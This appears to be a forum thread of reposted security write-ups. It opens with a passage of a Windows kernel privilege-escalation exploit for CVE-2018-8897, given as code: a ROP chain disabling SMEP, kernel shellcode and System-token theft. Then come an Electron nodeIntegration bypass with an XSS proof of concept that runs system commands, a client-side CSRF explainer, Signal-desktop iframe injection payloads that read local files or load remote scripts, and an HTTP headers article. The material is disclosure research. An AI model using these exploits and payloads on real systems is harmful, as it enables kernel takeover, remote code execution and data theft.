– RtlDispatchException

This one is going to be a little more detailed. RtlDispatchException calls RtlpGetStackLimits, which calls KeQueryCurrentStackInformation and __fastfails if it fails. The problem here is that KeQueryCurrentStackInformation checks the current value of RSP against Pcr.Prcb.RspBase, Pcr.Prcb.CurrentThread->InitialStack and Pcr.Prcb.IsrStack, and if it doesn't find a match it reports failure. We obviously cannot know the value of the kernel stack from user-mode, so what to do? There's a weird check in the middle of the function:

char __fastcall KeQueryCurrentStackInformation(_DWORD *a1, unsigned __int64 *a2, unsigned __int64 *a3)
{
    ...
    if ( *(_QWORD *)(*MK_FP(__GS__, 392i64) + 40i64) == *MK_FP(__GS__, 424i64) )
    {
        ...
    }
    else
    {
        *v5 = 5;
        result = 1;
        *v3 = 0xFFFFFFFFFFFFFFFFi64;
        *v4 = 0xFFFF800000000000i64;
    }
    return result;
}

Thanks to this check, as long as we make sure KThread.InitialStack (KThread + 0x28) is not equal to Pcr.Prcb.RspBase (gs:1A8h), KeQueryCurrentStackInformation will return success with 0xFFFF800000000000-0xFFFFFFFFFFFFFFFF as the reported stack range.
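The bailout path above can be modelled in a few lines. This is a toy sketch, not kernel code: the names and the fallback range come from the decompilation quoted above, and the "real path" branch is a stand-in for the stack comparisons the function actually performs.

```python
# Toy model of the KeQueryCurrentStackInformation bailout described above:
# if KThread.InitialStack != Prcb.RspBase, the RSP comparison is skipped
# entirely and a fixed "whole upper half" range is reported as success.
FALLBACK_LO = 0xFFFF800000000000
FALLBACK_HI = 0xFFFFFFFFFFFFFFFF

def query_stack_info(initial_stack: int, rsp_base: int, rsp: int):
    if initial_stack != rsp_base:
        return True, (FALLBACK_LO, FALLBACK_HI)  # success, fake range
    # Stand-in for the real path, which compares rsp against the known
    # kernel stacks (RspBase, InitialStack, IsrStack).
    return rsp_base - 0x6000 <= rsp <= rsp_base, (rsp_base - 0x6000, rsp_base)

# The exploit sets RspBase = 1 and InitialStack = 0, forcing the fallback
# regardless of the (unknown) kernel RSP:
ok, (lo, hi) = query_stack_info(initial_stack=0, rsp_base=1, rsp=0xDEADBEEF)
```

This is why setting the two fields to unequal dummy values (1 and 0) is enough to get RtlpGetStackLimits past its __fastfail check.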
Let's go ahead and set Pcr.Prcb.RspBase to 1 and Pcr.Prcb.CurrentThread->InitialStack to 0. Problem solved. RtlDispatchException after these changes will fail without bugchecking and return to KiDispatchException.

– KeBugCheckEx

We are finally here. Here's the last thing we need to fix:

MEMORY:FFFFF8018C1FB94A mov rcx, gs:qword_20
MEMORY:FFFFF8018C1FB953 mov rcx, [rcx+62C0h]
MEMORY:FFFFF8018C1FB95A call RtlCaptureContext

Pcr.CurrentPrcb->Context is where KeBugCheck saves the context of the caller and, for some weird reason, it is a PCONTEXT instead of a CONTEXT. We don't really care about any other fields of Pcr, so let's just set it to Pcr + 0x3000 for the sake of having a valid pointer for now.

0x2: Write|What|Where

And there we go, sweet sweet blue screen of victory! Now that everything works, how can we exploit it? The code after KeBugCheckEx is too complex to step through one by one and it is most likely not-so-fun to revert from, so let's try NOT to bugcheck this time. I wrote another IDA script to log the points of interest (such as gs: accesses and jumps and calls to registers and [registers+x]) and made it step until KeBugCheckEx is hit:

#include <idc.idc>

static main()
{
    Message( "--- Logging Points of Interest ---\n" );
    while( 1 )
    {
        auto IP = GetEventEa();
        auto Disasm = GetDisasmEx( IP, 1 );
        if ( ( strstr( Disasm, "gs:" ) >= Disasm ) ||
             ( strstr( Disasm, "jmp r" ) >= Disasm ) ||
             ( strstr( Disasm, "call r" ) >= Disasm ) ||
             ( strstr( Disasm, "jmp" ) >= Disasm && strstr( Disasm, "[r" ) >= Disasm ) ||
             ( strstr( Disasm, "call" ) >= Disasm && strstr( Disasm, "[r" ) >= Disasm ) )
        {
            Message( "-- %s (+%x): %s\n", GetFunctionName( IP ), IP - GetFunctionAttr( IP, FUNCATTR_START ), Disasm );
        }
        StepInto();
        GetDebuggerEvent( WFNE_SUSP, -1 );
        if( IP == ... )
            break;
    }
}

To my disappointment, there are no convenient jumps or calls.
The whole output is:

- KiDebugTrapOrFault (+3d): test word ptr gs:278h, 40h
- sub_FFFFF8018C207019 (+5): ldmxcsr dword ptr gs:180h
-- KiExceptionDispatch (+5f): mov rax, gs:188h
--- KiDispatchException (+48): mov rax, gs:188h
--- KiDispatchException (+5c): inc gs:5D30h
---- KeCopyLastBranchInformation (+38): mov rax, gs:20h
---- KeQueryCurrentStackInformation (+3b): mov rax, gs:188h
---- KeQueryCurrentStackInformation (+44): mov rcx, gs:1A8h
--- KeBugCheckEx (+1a): mov rcx, gs:20h

This means that we have to find a way to write to kernel-mode memory and abuse that instead. RtlCaptureContext will be a tremendous help here. As I mentioned before, it takes the context pointer from Pcr.CurrentPrcb->Context, which is weirdly a PCONTEXT Context and not a CONTEXT Context, meaning we can supply it any kernel address and make it write the context over it.

I was originally going to make it write over g_CiOptions and continuously NtLoadDriver in another thread, but this idea did not work as well as I thought (that being said, apparently this is the way @0xNemi and @nickeverdox got it working; I guess we will see what dark magic they used at BlackHat 2018), simply because the current thread is stuck in an infinite loop and the other thread trying to NtLoadDriver will not succeed because of the IPI it uses:

NtLoadDriver->…->MiSetProtectionOnSection->KeFlushMultipleRangeTb->IPI->Deadlock

After playing around with g_CiOptions for 1-2 days, I thought of a much better idea: overwriting the return address of RtlCaptureContext. How are we going to overwrite the return address without having access to RSP? If we use a little bit of creativity, we actually can have access to RSP. We can get the current RSP by making Prcb.Context point to user-mode memory and polling the Context.RSP value from a secondary thread. Sadly, this is not useful by itself, as we already passed RtlCaptureContext (our write-what-where exploit).
However, if we could return back to KiDebugTrapOrFault after RtlCaptureContext finishes its work and somehow predict the next value of RSP, this would be extremely abusable; which is exactly what we are going to do.

To return back to KiDebugTrapOrFault, we will again use our lovely debug registers. Right after RtlCaptureContext returns, a call to KiSaveProcessorControlState is made:

.text:000000014017595F mov rcx, gs:20h
.text:0000000140175968 add rcx, 100h
.text:000000014017596F call KiSaveProcessorControlState

.text:0000000140175C80 KiSaveProcessorControlState proc near ; CODE XREF: KeBugCheckEx+3Fp
.text:0000000140175C80                                       ; KeSaveStateForHibernate+ECp
...
.text:0000000140175C80 mov rax, cr0
.text:0000000140175C83 mov [rcx], rax
.text:0000000140175C86 mov rax, cr2
.text:0000000140175C89 mov [rcx+8], rax
.text:0000000140175C8D mov rax, cr3
.text:0000000140175C90 mov [rcx+10h], rax
.text:0000000140175C94 mov rax, cr4
.text:0000000140175C97 mov [rcx+18h], rax
.text:0000000140175C9B mov rax, cr8
.text:0000000140175C9F mov [rcx+0A0h], rax

We will set DR1 on gs:20h + 0x100 + 0xA0, and make KeBugCheckEx return back to KiDebugTrapOrFault just after it saves the value of CR4.

To overwrite the return pointer, we will first let KiDebugTrapOrFault->…->RtlCaptureContext execute once, giving our user-mode thread an initial RSP value; then we will let it execute another time to get the new RSP, which will let us calculate the per-execution RSP difference. This RSP delta will be constant because the control flow is also constant. Now that we have our RSP delta, we will predict the next value of RSP, subtract 8 from that to calculate the return pointer of RtlCaptureContext, and make Prcb.Context->Xmm13 – Prcb.Context->Xmm15 written over it.
Thread logic will be like the following:

volatile PCONTEXT Ctx = *( volatile PCONTEXT* ) ( Prcb + Offset_Prcb__Context );

while ( !Ctx->Rsp );                // Wait for RtlCaptureContext to be called once so we get leaked RSP
uint64_t StackInitial = Ctx->Rsp;

while ( Ctx->Rsp == StackInitial ); // Wait for it to be called another time so we get the stack pointer
                                    // difference between sequential KiDebugTrapOrFault
StackDelta = Ctx->Rsp - StackInitial;

PredictedNextRsp = Ctx->Rsp + StackDelta;            // Predict next RSP value when RtlCaptureContext is called
uint64_t NextRetPtrStorage = PredictedNextRsp - 0x8; // Predict where the return pointer will be located at
NextRetPtrStorage &= ~0xF;

*( uint64_t* ) ( Prcb + Offset_Prcb__Context ) = NextRetPtrStorage - Offset_Context__XMM13; // Make RtlCaptureContext write XMM13-XMM15 over it

Now we simply need to set up a ROP chain and write it to XMM13-XMM15. We cannot predict which half of XMM15 will get hit due to the mask we apply to comply with the movaps alignment requirement, so the first two pointers should simply point at a [RETN] instruction. We need to load a register with a value we choose to set CR4, so XMM14 will point at a [POP RCX; RETN] gadget, followed by a valid CR4 value with SMEP disabled. As for XMM13, we are simply going to use a [MOV CR4, RCX; RETN;] gadget followed by a pointer to our shellcode.
The final chain will look something like:

-- &retn;               (fffff80372e9502d)
-- &retn;               (fffff80372e9502d)
-- &pop rcx; retn;      (fffff80372ed9122)
-- cr4_nosmep           (00000000000506f8)
-- &mov cr4, rcx; retn; (fffff803730045c7)
-- &KernelShellcode     (00007ff613fb1010)

In our shellcode, we will need to restore the CR4 value, swapgs, roll back the ISR stack, execute the code we want and IRETQ back to user-mode, which can be done like below:

NON_PAGED_DATA fnFreeCall k_ExAllocatePool = 0;

using fnIRetToVulnStub = void( * ) ( uint64_t Cr4, uint64_t IsrStack, PVOID ContextBackup );

NON_PAGED_DATA BYTE IRetToVulnStub[] =
{
    0x0F, 0x22, 0xE1, // mov cr4, rcx ; cr4 = original cr4
    0x48, 0x89, 0xD4, // mov rsp, rdx ; stack = isr stack
    0x4C, 0x89, 0xC1, // mov rcx, r8  ; rcx = ContextBackup
    0xFB,             // sti          ; enable interrupts
    0x48, 0xCF        // iretq        ; interrupt return
};

NON_PAGED_CODE void KernelShellcode()
{
    __writedr( 7, 0 );

    uint64_t Cr4Old = __readgsqword( Offset_Pcr__Prcb + Offset_Prcb__Cr4 );
    __writecr4( Cr4Old & ~( 1 << 20 ) );
    __swapgs();

    uint64_t IsrStackIterator = PredictedNextRsp - StackDelta - 0x38;

    // Unroll nested KiBreakpointTrap -> KiDebugTrapOrFault -> KiTrapDebugOrFault
    while ( ( ( ISR_STACK* ) IsrStackIterator )->CS == 0x10 &&
            ( ( ISR_STACK* ) IsrStackIterator )->RIP > 0x7FFFFFFEFFFF )
    {
        __rollback_isr( IsrStackIterator );

        // We are @ KiBreakpointTrap -> KiDebugTrapOrFault, which won't follow the RSP Delta
        if ( ( ( ISR_STACK* ) ( IsrStackIterator + 0x30 ) )->CS == 0x33 )
        {
            /*
                fffff00e`d7a1bc38 fffff8007e4175c0 nt!KiBreakpointTrap
                fffff00e`d7a1bc40 0000000000000010
                fffff00e`d7a1bc48 0000000000000002
                fffff00e`d7a1bc50 fffff00ed7a1bc68
                fffff00e`d7a1bc58 0000000000000000
                fffff00e`d7a1bc60 0000000000000014
                fffff00e`d7a1bc68 00007ff7e2261e95 --
                fffff00e`d7a1bc70 0000000000000033
                fffff00e`d7a1bc78 0000000000000202
                fffff00e`d7a1bc80 000000ad39b6f938
            */
            IsrStackIterator = IsrStackIterator + 0x30;
            break;
        }
        IsrStackIterator -= StackDelta;
    }

    PVOID KStub = ( PVOID ) k_ExAllocatePool( 0ull, ( uint64_t ) sizeof( IRetToVulnStub ) );
    Np_memcpy( KStub, IRetToVulnStub, sizeof( IRetToVulnStub ) );

    // ------ KERNEL CODE ------
    ....
    // ------ KERNEL CODE ------

    __swapgs();
    ( ( ISR_STACK* ) IsrStackIterator )->RIP += 1;
    ( fnIRetToVulnStub( KStub ) )( Cr4Old, IsrStackIterator, ContextBackup );
}

We can't restore any registers, so we will make the thread responsible for triggering the vulnerability store the context in a global container and restore from it instead. Now that we have executed our code and returned to user-mode, our exploit is complete! Let's make a simple demo stealing the System token:

uint64_t SystemProcess = *k_PsInitialSystemProcess;
uint64_t CurrentProcess = k_PsGetCurrentProcess();

uint64_t CurrentToken = k_PsReferencePrimaryToken( CurrentProcess );
uint64_t SystemToken = k_PsReferencePrimaryToken( SystemProcess );

for ( int i = 0; i < 0x500; i += 0x8 )
{
    uint64_t Member = *( uint64_t * ) ( CurrentProcess + i );
    if ( ( Member & ~0xF ) == CurrentToken )
    {
        *( uint64_t * ) ( CurrentProcess + i ) = SystemToken;
        break;
    }
}

k_PsDereferencePrimaryToken( CurrentToken );
k_PsDereferencePrimaryToken( SystemToken );

Complete implementation of the concept can be found at: https://github.com/can1357/CVE-2018-8897

Credits: @0xNemi and @nickeverdox for finding the vulnerability

P.S.: If you want to try this exploit out, you can uninstall the relevant update and give it a try!

P.P.S.: Before you ask why I don't use intrinsics to read/write GSBASE, it is because MSVC generates invalid code.

Sursa: https://blog.can.ac/2018/05/11/arbitrary-code-execution-at-ring-0-using-cve-2018-8897/
  20. CVE-2018-1000136 - Electron nodeIntegration Bypass

May 10, 2018 - Posted By Brendan Scarvell

A few weeks ago, I came across a vulnerability that affected all current versions of Electron at the time (< 1.7.13, < 1.8.4, and < 2.0.0-beta.3). The vulnerability allowed nodeIntegration to be re-enabled, leading to the potential for remote code execution. If you're unfamiliar with Electron, it is a popular framework that allows you to create cross-platform desktop applications using HTML, CSS, and JavaScript. Some popular applications such as Slack, Discord, Signal, Atom, Visual Studio Code, and Github Desktop are all built using the Electron framework. You can find a list of applications built with Electron here.

Electron applications are essentially web apps, which means they're susceptible to cross-site scripting attacks through failure to correctly sanitize user-supplied input. A default Electron application includes access not only to its own APIs, but also to all of Node.js' built-in modules. This makes XSS particularly dangerous, as an attacker's payload can do some nasty things such as requiring the child_process module and executing system commands on the client-side. Atom had an XSS vulnerability not too long ago which did exactly that. You can remove access to Node.js by passing nodeIntegration: false into your application's webPreferences.

There's also a WebView tag feature which allows you to embed content, such as web pages, into your Electron application and run it as a separate process. When using a WebView tag you are also able to pass in a number of attributes, including nodeIntegration. WebView containers do not have nodeIntegration enabled by default. The documentation states that if the webviewTag option is not explicitly declared in your webPreferences, it will inherit the same permissions of whatever the value of nodeIntegration is set to.
By default, Electron also uses its own custom window.open() function which creates a new instance of a BrowserWindow. The child window will inherit all of the parent window's options (which includes its webPreferences) by default. The custom window.open() function does allow you to override some of the inherited options by passing in a features argument:

if (!usesNativeWindowOpen) {
  // Make the browser window or guest view emit "new-window" event.
  window.open = function (url, frameName, features) {
    if (url != null && url !== '') {
      url = resolveURL(url)
    }
    const guestId = ipcRenderer.sendSync('ELECTRON_GUEST_WINDOW_MANAGER_WINDOW_OPEN', url, toString(frameName), toString(features))
    if (guestId != null) {
      return getOrCreateProxy(ipcRenderer, guestId)
    } else {
      return null
    }
  }

  if (openerId != null) {
    window.opener = getOrCreateProxy(ipcRenderer, openerId)
  }
}

When Electron's custom window.open function is called, it emits an ELECTRON_GUEST_WINDOW_MANAGER_WINDOW_OPEN event. The ELECTRON_GUEST_WINDOW_MANAGER_WINDOW_OPEN event handler then parses the features provided, adding them as options to the newly created window, and then emits an ELECTRON_GUEST_WINDOW_MANAGER_INTERNAL_WINDOW_OPEN event.
To prevent child windows from being able to do nasty things like re-enabling nodeIntegration when the parent window has it explicitly disabled, guest-window-manager.js contains a hardcoded list of webPreferences options and their restrictive values:

// Security options that child windows will always inherit from parent windows
const inheritedWebPreferences = new Map([
  ['contextIsolation', true],
  ['javascript', false],
  ['nativeWindowOpen', true],
  ['nodeIntegration', false],
  ['sandbox', true],
  ['webviewTag', false]
])

The ELECTRON_GUEST_WINDOW_MANAGER_INTERNAL_WINDOW_OPEN event handler then calls the mergeBrowserWindowOptions function, which ensures that the restricted attributes of the parent window's webPreferences are applied to the child window:

const mergeBrowserWindowOptions = function (embedder, options) {
  [...]
  // Inherit certain option values from parent window
  for (const [name, value] of inheritedWebPreferences) {
    if (embedder.getWebPreferences()[name] === value) {
      options.webPreferences[name] = value
    }
  }

  // Sets correct openerId here to give correct options to 'new-window' event handler
  options.webPreferences.openerId = embedder.id
  return options
}

And here is where the vulnerability lies. The mergeBrowserWindowOptions function didn't take into account what the default values of these restricted attributes should be if they were undefined. In other words, if webviewTag: false wasn't explicitly declared in your application's webPreferences (and was therefore being inferred by explicitly setting nodeIntegration: false), when mergeBrowserWindowOptions went to check the webviewTag, it would come back undefined, thus making the above if statement return false and not apply the parent's webviewTag preference. This allowed window.open to pass the webviewTag option as an additional feature, re-enabling nodeIntegration and allowing the potential for remote code execution.
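The inheritance flaw above boils down to comparing a missing value against a restricted value. A toy model (illustrative only, not Electron's actual code) shows why an undeclared option slips through:

```python
# Toy model of the restricted-preference merge described above.
RESTRICTED = {"contextIsolation": True, "javascript": False,
              "nativeWindowOpen": True, "nodeIntegration": False,
              "sandbox": True, "webviewTag": False}

def merge_prefs_buggy(parent_prefs: dict, child_prefs: dict) -> dict:
    child = dict(child_prefs)
    for name, value in RESTRICTED.items():
        # Bug: when the parent never declared the option, .get() yields
        # None, the equality check fails, and nothing is inherited.
        if parent_prefs.get(name) == value:
            child[name] = value
    return child

# Parent disabled nodeIntegration but never declared webviewTag:
parent = {"nodeIntegration": False}
child = merge_prefs_buggy(parent, {"webviewTag": True})
# nodeIntegration is forced off, yet webviewTag=True sneaks through.
```

A fix in this model would treat an undeclared restricted option as if the parent had set it to its restrictive value before comparing.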
The following proof-of-concept shows how an XSS payload can re-enable nodeIntegration at run time and allow execution of system commands:

<script>
var x = window.open('data://yoloswag','','webviewTag=yes,show=no');
x.eval(
  "var webview = new WebView;"+
  "webview.setAttribute('webpreferences', 'webSecurity=no, nodeIntegration=yes');"+
  "webview.src = `data:text/html;base64,PHNjcmlwdD5yZXF1aXJlKCdjaGlsZF9wcm9jZXNzJykuZXhlYygnbHMgLWxhJywgZnVuY3Rpb24gKGUscikgeyBhbGVydChyKTt9KTs8L3NjcmlwdD4=`;"+
  "document.body.appendChild(webview)"
);
</script>

If you find an Electron application with the nodeIntegration option disabled and it contains either an XSS vulnerability through poor sanitization of user input or a vulnerability in another dependency of the application, the above proof-of-concept can allow for remote code execution, provided that the application is using a vulnerable version of Electron (version < 1.7.13, < 1.8.4, or < 2.0.0-beta.3) and hasn't manually opted into one of the following:
- Declared webviewTag: false in its webPreferences.
- Enabled the nativeWindowOpen option in its webPreferences.
- Intercepting new-window events and overriding event.newGuest without using the supplied options tag.

We'd also like to thank the Electron team for being extremely responsive and for quickly providing a patch to the public. This vulnerability was assigned the CVE identifier CVE-2018-1000136.

Sursa: https://www.trustwave.com/Resources/SpiderLabs-Blog/CVE-2018-1000136---Electron-nodeIntegration-Bypass/
  21. "Client-Side" CSRF

Facebook Bug Bounty - Friday, May 11, 2018

At Facebook, the Whitehat program receives hundreds of submissions a month, covering a wide range of vulnerability types. One of the interesting classes of issue which we've seen recently is what we've termed "Client-Side" Cross-Site Request Forgery (CSRF), for which we've awarded on average $7.5k.

What is CSRF?

Before we jump into technical details, let's recap on what CSRF is. This is a class of issue in which an attacker can perform a state-changing action, such as posting a status, on behalf of another user. This is made possible due to the fact that browsers (currently, until Same-Site Cookies are supported in all major browsers) send the user's cookies with a request, regardless of the request origin. At Facebook, like other large sites, we have protections in place to mitigate this kind of attack. The most common type of protection is adding a random token to each state-changing request, and verifying this server-side. An attacker has no way of knowing this value in advance, which means we can ensure any request has explicitly been made by the user. If you're participating in our Whitehat program, then you might see this token being sent - we name it "fb_dtsg".

"Client-Side" CSRF

Whilst most researchers think of CSRF as a server-side problem, "Client-Side" CSRF exists in the user's browser or mobile device - a malicious user could perform arbitrary requests to a CSRF-protected end-point, by modifying the end-point to which the client-side code makes an HTTP request with a valid CSRF token. This could be a form submission, or an XHR call. For example, a product might want to log some analytic data after the page is loaded, which could look like the following code:

let analytic_uri = window.location.hash.substr(1);
(new AsyncRequest("/ajax" + analytic_uri))
    .method(POST)
    .setBody({csrf_token: csrf_token})
    .send()

The user would browse to /profile.php#/profile/log.
On page load, the JS would make a POST request to "/ajax/profile/log", and the data would be saved. However, if an attacker modifies the fragment to "#/updatestatus?status=Hello", then the JS instead makes a request to update the user's status, with a valid CSRF token.

One good trick for hunting for these kinds of issues is looking for HTTP requests which are made after the page is rendered - if the end-point being requested is contained in the page's query string or fragment, then it's worth investigating! If you can only control part of the end-point, then it could still be vulnerable, by using tricks like path traversal.

Making arbitrary GraphQL requests

We had a great submission from one of our top researchers, Philippe Harewood, which used this style of issue to make arbitrary GraphQL requests on behalf of another user, for which we rewarded him $7,500. On https://business.instagram.com, we had a page which took a business ID from the request, and made a Graph API request to that particular business:

POST /[business_id]?fields=...
access_token=...

Facebook's Graph API is protected against CSRF by requiring a valid access token from the user. Without this token, the request is un-authenticated. Philippe found that since the business ID wasn't validated to be an integer, he could change it to point to our GraphQL end-point (graphql), and make authenticated requests for the user (such as posting a new status), since the JS was making the request with the access token:

POST /graphql?q=Mutation...&fields=...
access_token=...

This is a great example of influencing authenticated requests to point somewhere completely unintended.

Conclusion

These issues are an interesting and novel take on an older class of bugs, which has prompted us to take a look at ways of detecting and mitigating bugs in JS. If you too enjoy investigating and solving novel bugs, then come join the ProdSec team!

Sursa: https://www.facebook.com/notes/facebook-bug-bounty/client-side-csrf/2056804174333798/
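The usual mitigation for the fragment-driven request above is to validate the derived endpoint before issuing the request. A minimal sketch (the allowlist entries are hypothetical, and real client code would do this in JS; Python is used here just to show the check):

```python
from typing import Optional
from urllib.parse import urlsplit
import posixpath

ALLOWED_ENDPOINTS = {"/profile/log", "/profile/view"}  # hypothetical allowlist

def resolve_endpoint(fragment: str) -> Optional[str]:
    """Return the endpoint only if it is on the allowlist; None otherwise."""
    path = urlsplit(fragment).path       # drop any ?query the attacker appends
    path = posixpath.normpath(path)      # collapse ../ traversal tricks
    return path if path in ALLOWED_ENDPOINTS else None
```

With this check, "#/updatestatus?status=Hello" and "#/profile/log/../../updatestatus" both resolve to endpoints outside the allowlist and the CSRF-token-bearing request is never sent.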
  22. signal-desktop HTML tag injection advisory

Title: Signal-desktop HTML tag injection
Date Published: 2018-05-14
Last Update: 2018-05-14
CVE Name: CVE-2018-10994
Class: Code injection
Remotely Exploitable: Yes
Locally Exploitable: No
Vendors contacted: Signal.org

Vulnerability Description:
Signal-desktop is the standalone desktop version of the secure Signal messenger. This software is vulnerable to remote code execution from a malicious contact, by sending a specially crafted message containing HTML code that is injected into the chat windows (cross-site scripting).

Vulnerable Packages:
Signal-desktop messenger v1.7.1
Signal-desktop messenger v1.8.0
Signal-desktop messenger v1.9.0
Signal-desktop messenger v1.10.0
Originally found in v1.9.0 and v1.10.0, but after reviewing the source code the aforementioned are the impacted versions.

Solution/Vendor Information/Workaround:
Upgrade to Signal-desktop messenger v1.10.1 or v1.11.0-beta.3. For safer communications on desktop systems, please consider the use of a safer end-point client like PGP or GnuPG instead.

Credits: This vulnerability was found and researched by Iván Ariel Barrera Oro (@HacKanCuBa), Alfredo Ortega (@ortegaalfredo) and Juliano Rizzo (@julianor), with assistance from Javier Lorenzo Carlos Smaldone (@mis2centavos).

Technical Description – Exploit/Concept Code
While discussing an XSS vulnerability on a website using the Signal-desktop messenger, it was found that the messenger software also displayed a code-injection vulnerability while parsing the affected URLs. The Signal-desktop software fails to sanitize specific html-encoded HTML tags that can be used to inject HTML code into remote chat windows. Specifically, the <img> and <iframe> tags can be used to include remote or local resources. For example, the use of iframes enables full code execution, allowing an attacker to download/upload files, information, etc. The <script> tag was also found injectable.
In the Windows operating system, the CSP fails to prevent remote inclusion of resources via the SMB protocol. In this case, remote execution of JavaScript can be achieved by referencing the script in an SMB share as the source of an iframe tag, for example: <iframe src=\\DESKTOP-XXXXX\Temp\test.html>. The included JavaScript code is then executed automatically, without any interaction needed from the user. The vulnerability can be triggered in the signal-desktop client by sending a specially crafted message.

Examples:

Show an iframe with some text:
http://hacktheplanet/?p=%3Ciframe%20srcdoc="<p>PWONED!!</p>"%3E%3C/iframe%3E

Display content of user’s own /etc/passwd file:
http://hacktheplanet/?p=%3d%3Ciframe%20src=/etc/passwd%3E

Include and execute a remote JavaScript file (for Windows clients):
http://hacktheplanet/?p=%3d%3Ciframe%20src=\\XXX.XXX.XXX.XXX\Temp\test.html%3E

Show a base64-encoded image (bypass “click to download image”):
http://hacktheplanet/?p=%3Cimg%20src="data:image/jpeg;base64,/9j/4AAQSkZJRgABAQEASABIAAD/2wBDACgcHiMeGSgjISMtKygwPGRBPDc3PHtYXUlkkYCZlo+AjIqgtObDoKrarYqMyP/L2u71////m8H////6/+b9//j/wAALCAAtADwBAREA/8QAHwAAAQUBAQEBAQEAAAAAAAAAAAECAwQFBgcICQoL/8QAtRAAAgEDAwIEAwUFBAQAAAF9AQIDAAQRBRIhMUEGE1FhByJxFDKBkaEII0KxwRVS0fAkM2JyggkKFhcYGRolJicoKSo0NTY3ODk6Q0RFRkdISUpTVFVWV1hZWmNkZWZnaGlqc3R1dnd4eXqDhIWGh4iJipKTlJWWl5iZmqKjpKWmp6ipqrKztLW2t7i5usLDxMXGx8jJytLT1NXW19jZ2uHi4+Tl5ufo6erx8vP09fb3+Pn6/9oACAEBAAA/AMapRbv5YckKD0z1pPJbjJAzSGIgjcQMnFEkZSTZkE+1STWksTKrAZbpThYzfLuAUN3JFJ9kkyeV4PrTBFyNzCpSGuZiRgY4ArRgtAvzSfMfSqN3EYpjsA2noTg1B87HlqNrnqxP40nlt6ml8pvWo/MY/wARqzAzcEVorK24RuAAw4IqLUo2EKFFJIOM9azN8oOMkfhTz9oVdxDhfWlR3ZOWJ/Gpdzep/OqVTQEq2MVpo4aNWABKHnNLIzNHGW7OST6DFZ92wEoAGAvX3qNrl/KaEH5CePaliPyYqVTwKrIu41O1u0Z4BP06irUDKiky5DYx04p8sxddpwFA6etZcrFnJPepLa2NwSFPIoQbQVPUHFTLjFUskd6d5j/3m/Ok3sf4j+dG9j/EfzpKVXZPusR9DSZPrS7j6mv/2Q=="%3e

Timeline:
2018-05-10 18:45 GMT-3: vuln discovered
2018-05-11 13:03 GMT-3: emailed Signal security team
2018-05-11 15:02 GMT-3: reply from Signal: vuln confirmed & patch ongoing
2018-05-11 16:12 GMT-3: patch committed
2018-05-11 18:00 GMT-3: signal-desktop update published
2018-05-14 18:00 GMT-3: public disclosure

References:
Patch: https://github.com/signalapp/Signal-Desktop/compare/v1.11.0-beta.2…v1.11.0-beta.3
Writeup: https://ivan.barreraoro.com.ar/signal-desktop-html-tag-injection/

Sursa: https://ivan.barreraoro.com.ar/signal-desktop-html-tag-injection/advisory/
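To see what the percent-encoded payloads from the advisory actually deliver to the rendering code, they can be decoded with the Python standard library (only the tag portion of each URL parameter is shown here):

```python
from urllib.parse import unquote

payloads = [
    '%3Ciframe%20srcdoc="<p>PWONED!!</p>"%3E%3C/iframe%3E',
    "%3Ciframe%20src=/etc/passwd%3E",
]

# Decode %3C -> <, %20 -> space, %3E -> > to recover the injected HTML.
decoded = [unquote(p) for p in payloads]
for d in decoded:
    print(d)
# <iframe srcdoc="<p>PWONED!!</p>"></iframe>
# <iframe src=/etc/passwd>
```

This makes the advisory's point concrete: what travels in the message is an encoded string, and it is the client's failure to sanitize the decoded tags that enables injection.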
  23. The headers we don't want By Andrew Betts | May 10, 2018 If you want to learn more about headers, don’t miss Andrew’s talk at Altitude London on May 22. HTTP headers are an important way of controlling how caches and browsers process your web content. But many are used incorrectly or pointlessly, which adds overhead at a critical time in the loading of your page, and may not work as you intended. In this first of a series of posts about header best practice, we’ll look at unnecessary headers. Most developers know about and depend on a variety of HTTP headers to make their content work. Those that are best known include Content-Type and Content-Length, which are both almost universal. But more recently, headers such as Content-Security-Policy and Strict-Transport-Security have started to improve security, and Link rel=preload headers to improve performance. Few sites use these, despite their wide support across browsers. At the same time, there are lots of headers that are hugely popular but aren’t new and aren’t actually all that useful. We can prove this using HTTP Archive, a project run by Google and sponsored by Fastly that loads 500,000 websites every month using WebPageTest, and makes the results available in BigQuery. 
From the HTTP Archive data, here are the 30 most popular response headers (based on the number of domains in the archive which are serving each header), and roughly how useful each one is:

Header name                       Requests  Domains  Status
date                              48779277  535621   Required by protocol
content-type                      47185627  533636   Usually required by browser
server                            43057807  519663   Unnecessary
content-length                    42388435  519118   Useful
last-modified                     34424562  480294   Useful
cache-control                     36490878  412943   Useful
etag                              23620444  412370   Useful
content-encoding                  16194121  409159   Required for compressed content
expires                           29869228  360311   Unnecessary
x-powered-by                      4883204   211409   Unnecessary
pragma                            7641647   188784   Unnecessary
x-frame-options                   3670032   105846   Unnecessary
access-control-allow-origin       11335681  103596   Useful
x-content-type-options            11071560  94590    Useful
link                              1212329   87475    Useful
age                               7401415   59242    Useful
x-cache                           5275343   56889    Unnecessary
x-xss-protection                  9773906   51810    Useful
strict-transport-security         4259121   51283    Useful
via                               4020117   47102    Unnecessary
p3p                               8282840   44308    Unnecessary
expect-ct                         2685280   40465    Useful
content-language                  334081    37927    Debatable
x-aspnet-version                  676128    33473    Unnecessary
access-control-allow-credentials  2804382   30346    Useful
x-robots-tag                      179177    24911    Not relevant to browsers
x-ua-compatible                   489056    24811    Unnecessary
access-control-allow-methods      1626129   20791    Useful
access-control-allow-headers      1205735   19120    Useful

Let’s look at the unnecessary headers and see why we don’t need them, and what we can do about it.

Vanity (server, x-powered-by, via)

You may be very proud of your choice of server software, but most people couldn’t care less. At worst, these headers might be divulging sensitive data that makes your site easier to attack.

Server: apache
X-Powered-By: PHP/5.1.1
Via: 1.1 varnish, 1.1 squid

RFC7231 allows for servers to include a Server header in the response, identifying the software used to serve the content. This is most commonly a string like “apache” or “nginx”.
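The table's verdicts can be turned into a rough self-audit. The sketch below is mine (the function name and header-dict shape are assumptions, not from the article); the set of "unnecessary" names is taken directly from the table's rows:

```python
# Response headers the article classifies as unnecessary.
UNNECESSARY = {
    "server", "expires", "x-powered-by", "pragma", "x-frame-options",
    "x-cache", "via", "p3p", "x-aspnet-version", "x-ua-compatible",
}

def flag_unnecessary(headers):
    """Return the response header names (lower-cased) the article suggests dropping."""
    return sorted(h.lower() for h in headers if h.lower() in UNNECESSARY)

print(flag_unnecessary({
    "Content-Type": "text/html",
    "Server": "apache",
    "X-Powered-By": "PHP/5.1.1",
    "Cache-Control": "no-store, private",
}))
# ['server', 'x-powered-by']
```

Note that some flagged headers (x-frame-options, expires) are "unnecessary" only because a better replacement exists, as the article explains below; the checker just points at candidates for review.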
